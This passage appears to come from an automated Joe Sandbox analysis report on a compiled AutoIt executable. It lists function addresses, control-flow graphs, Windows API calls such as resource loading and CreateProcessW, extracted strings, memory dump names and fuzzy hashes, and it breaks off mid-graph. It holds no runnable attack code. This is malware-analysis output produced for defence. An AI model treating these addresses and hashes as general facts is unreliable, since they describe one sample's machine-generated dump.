                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadCursorW.USER32 ref: 00007FF655FE3BAE
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BC3
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BDC
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BF5
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadImageW.USER32 ref: 00007FF655FE3C21
                                                                                                                      • Part of subcall function 00007FF655FE3B84: RegisterClassExW.USER32 ref: 00007FF655FE3C85
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: CreateWindowExW.USER32 ref: 00007FF655FE3D0C
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: CreateWindowExW.USER32 ref: 00007FF655FE3D5F
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: ShowWindow.USER32 ref: 00007FF655FE3D75
                                                                                                                      • Part of subcall function 00007FF655FE6258: Shell_NotifyIconW.SHELL32 ref: 00007FF655FE6350
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                    • API String ID: 1593035822-3287110873
                                                                                                                    • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                    • Instruction ID: b531ef2969509d6d28d45c1395abaafcdc1e948f5abd03e88e8942eff0eb3f21
                                                                                                                    • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                    • Instruction Fuzzy Hash: B8719065A1D68395FBA0AF20E9441FD2361BF51748F8C0132E54EE71A5DF6EEA0DC700
                                                                                                                    Function 00007FF655FE6580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 352 7ff655fe6580-7ff655fe65fc call 7ff656004c68 call 7ff655fe6c98 call 7ff656005d00 359 7ff655fe6602-7ff655fe6606 352->359 360 7ff655fe6737-7ff655fe673a 352->360 363 7ff655fe660c-7ff655fe6617 call 7ff656015514 359->363 364 7ff65602ca03-7ff65602ca1e 359->364 361 7ff655fe6740-7ff655fe6753 CreateStreamOnHGlobal 360->361 362 7ff65602c9f5-7ff65602c9fd call 7ff656062e00 360->362 361->359 365 7ff655fe6759-7ff655fe6777 FindResourceExW 361->365 362->364 373 7ff655fe661b-7ff655fe664e call 7ff655fe67d8 363->373 374 7ff65602ca27-7ff65602ca60 call 7ff655fe6810 call 7ff655fe67d8 364->374 365->359 369 7ff655fe677d 365->369 372 7ff65602c97e-7ff65602c991 LoadResource 369->372 372->359 375 7ff65602c997-7ff65602c9a8 SizeofResource 372->375 382 7ff655fe6654-7ff655fe665f 373->382 383 7ff655fe66e8 373->383 385 7ff655fe66ee 374->385 395 7ff65602ca66 374->395 375->359 378 7ff65602c9ae-7ff65602c9ba LockResource 375->378 378->359 381 7ff65602c9c0-7ff65602c9f0 378->381 381->359 386 7ff655fe66ae-7ff655fe66b2 382->386 387 7ff655fe6661-7ff655fe666f 382->387 383->385 392 7ff655fe66f1-7ff655fe6715 385->392 386->383 389 7ff655fe66b4-7ff655fe66cf call 7ff655fe6810 386->389 388 7ff655fe6670-7ff655fe667d 387->388 393 7ff655fe6680-7ff655fe668f 388->393 389->373 396 7ff655fe6717-7ff655fe6724 call 7ff656004c24 * 2 392->396 397 7ff655fe6729-7ff655fe6736 392->397 398 7ff655fe66d4-7ff655fe66dd 393->398 399 7ff655fe6691-7ff655fe6695 393->399 395->392 396->397 405 7ff655fe66e3-7ff655fe66e6 398->405 406 7ff655fe6782-7ff655fe678c 398->406 399->374 404 7ff655fe669b-7ff655fe66a8 399->404 404->388 408 7ff655fe66aa 404->408 405->399 409 7ff655fe678e 406->409 410 7ff655fe6797-7ff655fe67a1 406->410 408->386 409->410 411 7ff655fe67a3-7ff655fe67ad 410->411 412 7ff655fe67ce 410->412 413 7ff655fe67af-7ff655fe67bb 411->413 414 7ff655fe67c6 411->414 412->372 413->393 415 7ff655fe67c1 413->415 414->412 415->414
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: AU3!$EA06$SCRIPT
                                                                                                                    • API String ID: 3051347437-2925976212
                                                                                                                    • Opcode ID: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                                                                    • Instruction ID: 875b84f5d605919cdddbfbe518e7c0b2a513aa89e73618fccb5e924eda32c4ec
                                                                                                                    • Opcode Fuzzy Hash: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                                                                    • Instruction Fuzzy Hash: 12912A76B1964686EBA0CB21E448A7C3761FB45F98F494135DE5DAB781DF3DE808CB00
                                                                                                                    Function 00007FF656001D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 482 7ff656001d80-7ff656001e17 call 7ff655fe9640 GetVersionExW call 7ff655fe7cf4 487 7ff656001e1d 482->487 488 7ff656049450 482->488 489 7ff656001e20-7ff656001e46 call 7ff655fedda4 487->489 490 7ff656049457-7ff65604945d 488->490 495 7ff656001fc1 489->495 496 7ff656001e4c 489->496 492 7ff656049463-7ff656049480 490->492 492->492 494 7ff656049482-7ff656049485 492->494 494->489 497 7ff65604948b-7ff656049491 494->497 495->488 498 7ff656001e53-7ff656001e59 496->498 497->490 499 7ff656049493 497->499 500 7ff656001e5f-7ff656001e7c 498->500 501 7ff656049498-7ff6560494a1 499->501 500->500 502 7ff656001e7e-7ff656001e81 500->502 501->498 503 7ff6560494a7 501->503 502->501 504 7ff656001e87-7ff656001ed6 call 7ff655fedda4 502->504 503->495 507 7ff656001edc-7ff656001ede 504->507 508 7ff656049645-7ff65604964d 504->508 511 7ff656001ee4-7ff656001efa 507->511 512 7ff6560494ac-7ff6560494af 507->512 509 7ff65604965a-7ff65604965d 508->509 510 7ff65604964f-7ff656049658 508->510 515 7ff656049686-7ff656049692 509->515 516 7ff65604965f-7ff656049674 509->516 510->515 517 7ff656001f00-7ff656001f02 511->517 518 7ff656049572-7ff656049579 511->518 513 7ff656001f3c-7ff656001f80 GetCurrentProcess IsWow64Process call 7ff656006240 512->513 514 7ff6560494b5-7ff656049501 512->514 527 7ff65604969d-7ff6560496b3 call 7ff6560532f4 513->527 539 7ff656001f86-7ff656001f8b GetSystemInfo 513->539 514->513 520 7ff656049507-7ff65604950e 514->520 515->527 521 7ff656049676-7ff65604967d 516->521 522 7ff65604967f 516->522 525 7ff65604959e-7ff6560495b3 517->525 526 7ff656001f08-7ff656001f0b 517->526 523 7ff65604957b-7ff656049584 518->523 524 7ff656049589-7ff656049599 518->524 533 7ff656049534-7ff65604953c 520->533 534 7ff656049510-7ff656049518 520->534 521->515 522->515 523->513 524->513 530 7ff6560495c3-7ff6560495d3 525->530 531 7ff6560495b5-7ff6560495be 525->531 528 7ff6560495ed-7ff6560495f0 526->528 529 7ff656001f11-7ff656001f2d 526->529 550 7ff6560496d7-7ff6560496dc GetSystemInfo 527->550 551 7ff6560496b5-7ff6560496d5 call 7ff6560532f4 527->551 528->513 538 7ff6560495f6-7ff656049620 528->538 536 7ff656001f33 529->536 537 7ff6560495d8-7ff6560495e8 529->537 530->513 531->513 542 7ff65604954c-7ff656049554 533->542 543 7ff65604953e-7ff656049547 533->543 540 7ff65604951a-7ff656049521 534->540 541 7ff656049526-7ff65604952f 534->541 536->513 537->513 545 7ff656049622-7ff65604962b 538->545 546 7ff656049630-7ff656049640 538->546 547 7ff656001f91-7ff656001fc0 539->547 540->513 541->513 548 7ff656049556-7ff65604955f 542->548 549 7ff656049564-7ff65604956d 542->549 543->513 545->513 546->513 548->513 549->513 553 7ff6560496e2-7ff6560496ea 550->553 551->553 553->547 555 7ff6560496f0-7ff6560496f7 FreeLibrary 553->555 555->547
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                    • String ID: |O
                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction ID: fee56731b0f696e6c1e3e74328e2f9cda085f08a28866ea38a1f66eaf18bc083
                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction Fuzzy Hash: 38D1B1A1A5D2C285FB218F20AA0497A3BA4AF61784FCC0275D58EF3665DF6FB50CC701
                                                                                                                    Function 00007FF65607F630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 719 7ff65607f630-7ff65607f69e call 7ff656006240 722 7ff65607f6d4-7ff65607f6d9 719->722 723 7ff65607f6a0-7ff65607f6b8 call 7ff655feffbc 719->723 725 7ff65607f6db-7ff65607f6ef call 7ff655feffbc 722->725 726 7ff65607f71e-7ff65607f723 722->726 732 7ff65607f6ba-7ff65607f6d2 call 7ff655feffbc 723->732 733 7ff65607f708-7ff65607f70d 723->733 739 7ff65607f6f3-7ff65607f706 call 7ff655feffbc 725->739 727 7ff65607f736-7ff65607f75c call 7ff655fed4cc call 7ff655fee330 726->727 728 7ff65607f725-7ff65607f729 726->728 748 7ff65607f762-7ff65607f7cf call 7ff655fed4cc call 7ff655fee330 call 7ff655fed4cc call 7ff655fee330 call 7ff655fed4cc call 7ff655fee330 727->748 749 7ff65607f840-7ff65607f84a 727->749 731 7ff65607f72d-7ff65607f732 call 7ff655feffbc 728->731 731->727 732->739 740 7ff65607f719-7ff65607f71c 733->740 741 7ff65607f70f-7ff65607f717 733->741 739->726 739->733 740->726 740->727 741->731 798 7ff65607f806-7ff65607f83e GetSystemDirectoryW call 7ff656004c68 GetSystemDirectoryW 748->798 799 7ff65607f7d1-7ff65607f7f3 call 7ff655fed4cc call 7ff655fee330 748->799 750 7ff65607f87d-7ff65607f8af GetCurrentDirectoryW call 7ff656004c68 GetCurrentDirectoryW 749->750 751 7ff65607f84c-7ff65607f86e call 7ff655fed4cc call 7ff655fee330 749->751 760 7ff65607f8b5-7ff65607f8b8 750->760 751->750 769 7ff65607f870-7ff65607f87b call 7ff656008d58 751->769 762 7ff65607f8ba-7ff65607f8eb call 7ff655fff688 * 3 760->762 763 7ff65607f8f0-7ff65607f8ff call 7ff65605f464 760->763 762->763 776 7ff65607f905-7ff65607f95d call 7ff65605fddc call 7ff65605fca8 call 7ff65605fafc 763->776 777 7ff65607f901-7ff65607f903 763->777 769->750 769->763 781 7ff65607f964-7ff65607f96c 776->781 806 7ff65607f95f 776->806 777->781 783 7ff65607f972-7ff65607fa0d call 7ff65604d1f8 call 7ff656008d58 * 3 call 7ff656004c24 * 3 781->783 784 7ff65607fa0f-7ff65607fa4b CreateProcessW 781->784 788 7ff65607fa4f-7ff65607fa62 call 7ff656004c24 * 2 783->788 784->788 811 7ff65607fa64-7ff65607fabc call 7ff655fe4afc * 2 GetLastError call 7ff655fff214 call 7ff655ff13e0 788->811 812 7ff65607fabe-7ff65607faca CloseHandle 788->812 798->760 799->798 825 7ff65607f7f5-7ff65607f800 call 7ff656008d58 799->825 806->781 827 7ff65607fb3b-7ff65607fb65 call 7ff65605f51c 811->827 815 7ff65607facc-7ff65607faf0 call 7ff65605f7dc call 7ff656060088 call 7ff65607fb68 812->815 816 7ff65607faf5-7ff65607fafc 812->816 815->816 821 7ff65607fb0c-7ff65607fb35 call 7ff655ff13e0 CloseHandle 816->821 822 7ff65607fafe-7ff65607fb0a 816->822 821->827 822->827 825->760 825->798
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1787492119-0
                                                                                                                    • Opcode ID: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                                                                    • Instruction ID: dc2f380afc2abab4df6ed52674e5a2f1bd3665aacaf0612d10ed5460c28dd2df
                                                                                                                    • Opcode Fuzzy Hash: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                                                                    • Instruction Fuzzy Hash: 87E1C226B08B8285EB40DF26D65417D77A1FB84B98F084536EE5DE77A9CF39E809C700
                                                                                                                    Function 00007FF65605C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695905019-0
                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction ID: 7dda236f6465f4e6aba2b01468d4c28e97722ce7190cfdf463286331984cad9d
                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction Fuzzy Hash: 7EF08210E09602C1EA245B35FA083382361AF51B79F5C4334D97FA72E4DFADE49DC600
                                                                                                                    Function 00007FF655FE7920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                    • API String ID: 2667193904-1575078665
                                                                                                                    • Opcode ID: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                                                                    • Instruction ID: b9dce2c36a085abb4d6a9c39609faf4d51b3877c20e4bcf9ac2630e38e65de9a
                                                                                                                    • Opcode Fuzzy Hash: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                                                                    • Instruction Fuzzy Hash: E2919A22A2864395EB60DF14EA401BD7374FF84758F880236E64DE3AA5DF7DD949C740
                                                                                                                    Function 00007FF655FE5DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 131 7ff655fe5dec-7ff655fe5e21 133 7ff655fe5e23-7ff655fe5e26 131->133 134 7ff655fe5e91-7ff655fe5e94 131->134 136 7ff655fe5e98 133->136 137 7ff655fe5e28-7ff655fe5e2f 133->137 134->133 135 7ff655fe5e96 134->135 140 7ff655fe5e6b-7ff655fe5e76 DefWindowProcW 135->140 141 7ff65602c229-7ff65602c261 call 7ff655ffede4 call 7ff656002c44 136->141 142 7ff655fe5e9e-7ff655fe5ea3 136->142 138 7ff655fe5e35-7ff655fe5e3a 137->138 139 7ff655fe5f21-7ff655fe5f29 PostQuitMessage 137->139 143 7ff655fe5e40-7ff655fe5e43 138->143 144 7ff65602c2af-7ff65602c2c5 call 7ff65605a40c 138->144 147 7ff655fe5ec8-7ff655fe5eca 139->147 146 7ff655fe5e7c-7ff655fe5e90 140->146 176 7ff65602c267-7ff65602c26e 141->176 148 7ff655fe5ea5-7ff655fe5ea8 142->148 149 7ff655fe5ecc-7ff655fe5efa SetTimer RegisterWindowMessageW 142->149 150 7ff655fe5f2b-7ff655fe5f35 call 7ff656004610 143->150 151 7ff655fe5e49-7ff655fe5e4e 143->151 144->147 167 7ff65602c2cb 144->167 147->146 155 7ff65602c1b8-7ff65602c1bb 148->155 156 7ff655fe5eae-7ff655fe5ebe KillTimer call 7ff655fe5d88 148->156 149->147 152 7ff655fe5efc-7ff655fe5f09 CreatePopupMenu 149->152 169 7ff655fe5f3a 150->169 157 7ff655fe5e54-7ff655fe5e59 151->157 158 7ff65602c292-7ff65602c299 151->158 152->147 162 7ff65602c1f7-7ff65602c224 MoveWindow 155->162 163 7ff65602c1bd-7ff65602c1c0 155->163 172 7ff655fe5ec3 call 7ff655fe7098 156->172 165 7ff655fe5e5f-7ff655fe5e65 157->165 166 7ff655fe5f0b-7ff655fe5f1f call 7ff655fe5f3c 157->166 158->140 173 7ff65602c29f-7ff65602c2aa call 7ff65604c54c 158->173 162->147 170 7ff65602c1e4-7ff65602c1f2 SetFocus 163->170 171 7ff65602c1c2-7ff65602c1c5 163->171 165->140 165->176 166->147 167->140 169->147 170->147 171->165 177 7ff65602c1cb-7ff65602c1df call 7ff655ffede4 171->177 172->147 173->140 176->140 181 7ff65602c274-7ff65602c28d call 7ff655fe5d88 call 7ff655fe6258 176->181 177->147 181->140
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction ID: 5f3856f9bfbc82b514493eb08b6f94e36164618d2859de5a68fc8c1c1995ed36
                                                                                                                    • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction Fuzzy Hash: 50519B35D0C64781FBB49B24EA4827E2265AF55B88F8C0631D44EF36A5DE6EF948CB00
                                                                                                                    Function 00007FF655FE3D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-2659433951
                                                                                                                    • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction ID: cc038dee66b458e2fb462cd860ed98a57af77017d70f0842e48941a177731151
                                                                                                                    • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction Fuzzy Hash: 37311632A18B018AE700CF61E9443A937B5FB48758F584239CA4EA7B64EF7ED159CB40
                                                                                                                    Function 00007FF655FFE958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 189 7ff655ffe958-7ff655ffe9ae 190 7ff655ffe9b4-7ff655ffe9d3 mciSendStringW 189->190 191 7ff6560427e4-7ff6560427ea DestroyWindow 189->191 192 7ff655ffecbd-7ff655ffecce 190->192 193 7ff655ffe9d9-7ff655ffe9e3 190->193 194 7ff6560427f0-7ff656042801 191->194 196 7ff655ffecd0-7ff655ffecf0 UnregisterHotKey 192->196 197 7ff655ffecf7-7ff655ffed01 192->197 193->194 195 7ff655ffe9e9 193->195 201 7ff656042835-7ff65604283f 194->201 202 7ff656042803-7ff656042806 194->202 200 7ff655ffe9f0-7ff655ffe9f3 195->200 196->197 198 7ff655ffecf2 call 7ff655fff270 196->198 197->193 199 7ff655ffed07 197->199 198->197 199->192 207 7ff655ffecb0-7ff655ffecb8 call 7ff655fe5410 200->207 208 7ff655ffe9f9-7ff655ffea08 call 7ff655fe3aa8 200->208 201->194 206 7ff656042841 201->206 203 7ff656042808-7ff656042811 call 7ff655fe8314 202->203 204 7ff656042813-7ff656042817 FindClose 202->204 210 7ff65604281d-7ff65604282e 203->210 204->210 216 7ff656042846-7ff65604284f call 7ff656078c00 206->216 207->200 218 7ff655ffea0f-7ff655ffea12 208->218 210->201 215 7ff656042830 call 7ff656063180 210->215 215->201 216->218 218->216 221 7ff655ffea18 218->221 223 7ff655ffea1f-7ff655ffea22 221->223 224 7ff656042854-7ff65604285d call 7ff6560546cc 223->224 225 7ff655ffea28-7ff655ffea32 223->225 224->223 226 7ff655ffea38-7ff655ffea42 225->226 227 7ff656042862-7ff656042873 225->227 231 7ff65604288c-7ff65604289d 226->231 232 7ff655ffea48-7ff655ffea76 call 7ff655ff13e0 226->232 229 7ff65604287b-7ff656042885 227->229 230 7ff656042875 FreeLibrary 227->230 229->227 234 7ff656042887 229->234 230->229 235 7ff6560428c9-7ff6560428d3 231->235 236 7ff65604289f-7ff6560428c2 VirtualFree 231->236 242 7ff655ffeabf-7ff655ffeacc OleUninitialize 232->242 243 7ff655ffea78 232->243 234->231 235->231 240 7ff6560428d5 235->240 236->235 238 7ff6560428c4 call 7ff65606321c 236->238 238->235 245 7ff6560428da-7ff6560428de 240->245 244 7ff655ffead2-7ff655ffead9 242->244 242->245 246 7ff655ffea7d-7ff655ffeabd call 7ff655fff1c4 call 7ff655fff13c 243->246 247 7ff655ffeadf-7ff655ffeaea 244->247 248 7ff6560428f4-7ff656042903 call 7ff6560631d4 244->248 245->244 250 7ff6560428e4-7ff6560428ef 245->250 246->242 252 